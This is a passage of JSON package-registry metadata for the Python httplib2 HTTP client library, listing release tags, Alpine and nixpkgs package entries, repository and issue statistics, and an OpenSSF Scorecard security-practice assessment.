l":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T14:22:35.554Z","dependent_packages_count":2,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":8.116019159127195,"stargazers_count":6.466205428419372,"forks_count":4.576902607770091,"average":4.789781798829164},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.11/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.11/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.11/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.11/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.11/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.11/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":"fabian@affolter-engineering.ch","url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":150,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-20T00:01:54.926Z","updated_at":"2023-02-20T00:01:54.926Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.11/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.11","url":"https://pkgs.alpinelinux.org/packages?branch=v3.11","ecosystem":"alpine","default":false,"packages_count":11274,"maintainers_count":184,"namespaces_count":2,"keywords_count":1196,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":408},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.767Z","updated_at":"2026-08-23T05:04:34.871Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.11/namespaces"}},{"id":12889337,"name":"python314Packages.httplib2","ecosystem":"nixpkgs","description":"Comprehensive HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["python"],"namespace":null,"versions_count":2,"first_release_published_at":"2026-01-27T07:47:22.450Z","latest_release_published_at":"2026-03-08T04:38:58.422Z","latest_release_number":"0.31.1","last_synced_at":"2026-03-08T04:38:58.796Z","created_at":"2026-01-27T07:47:22.217Z","updated_at":"2026-08-21T23:57:46.417Z","registry_url":"https://search.nixos.org/packages?channel=unstable\u0026query=python314Packages.httplib2","install_command":"nix-env -iA nixpkgs.python314Packages.httplib2","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-unstable/pkgs/development/python-modules/httplib2/default.nix#L70","metadata":{"nix_attribute":"python3.14-httplib2-0.31.1","position":"pkgs/development/python-modules/httplib2/default.nix:70","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","aarch64-darwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd","aarch64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"httplib2","upstream_purl":"pkg:pypi/httplib2"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code 